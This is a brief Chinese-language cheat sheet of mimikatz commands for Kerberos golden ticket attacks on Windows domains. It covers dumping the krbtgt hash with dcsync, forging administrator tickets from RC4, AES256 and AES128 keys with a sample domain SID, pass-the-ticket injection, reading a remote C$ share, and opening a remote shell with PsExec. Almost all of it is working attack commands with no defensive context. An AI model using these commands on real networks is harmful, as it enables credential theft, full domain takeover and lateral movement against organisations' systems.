关于域渗透Kerberos黄金票据的一些常用命令

关于域渗透Kerberos黄金票据的一些常用命令

lsadump::dcsync的使用条件,获取以下任意一个用户权限：
  1、Administrators 组
  2、Domain Admins组
  3、Enterprise Admins（企业管理员）组
  4、域控制器的计算机账户

mimikatz.exe "lsadump::dcsync /domain:x.com /user:krbtgt" > 2.txt exit 普通管理员

Kerberos::golden /user:administrator /domain:X.com /sid:S-1-5-21-3670766156-1148163679-932913256 /krbtgt:6a306a439440491213ab2780e62571e3 /ticket:test1.kirbi

生成票据

kerberos::purge         //清空当前所有凭证
kerberos::list          //查看当前凭证
kerberos::ptt test1.kirbi

dir \\Win2008-Srv-PC.Xcom\c$

# 使用krbtgt的rc4值：
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /rc4:6a306a439440491213ab2780e62571e3 /user:administrator /ptt
mimikatz# kerberos::purge

# 使用krbtgt的aes256值：
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes256:11d966a60877876b3d6c989b4919ea947263f0f0d746d801e832e761c06680d6 /user:administrator /ptt
mimikatz# kerberos::purge

# 使用krbtgt的aes128值：### 失败，默认不是 aes128加密类型
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes128:4068038cab008b9b7b28d2e5510a70b6 /user:administrator /ptt
mimikatz# kerberos::purge

# 使用krbtgt的aes256值：
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes256:11d966a60877876b3d6c989b4919ea947263f0f0d746d801e832e761c06680d6 

mimikatz# kerberos::purge

PsExec.exe \\Win2008-Srv-PC.x.com cmd.exe